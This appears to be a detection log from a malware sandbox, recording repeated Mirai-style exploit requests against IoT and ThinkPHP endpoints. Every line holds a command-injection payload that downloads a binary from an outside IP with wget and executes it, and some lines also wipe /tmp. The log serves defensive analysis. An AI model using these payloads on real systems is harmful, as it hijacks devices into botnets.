Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
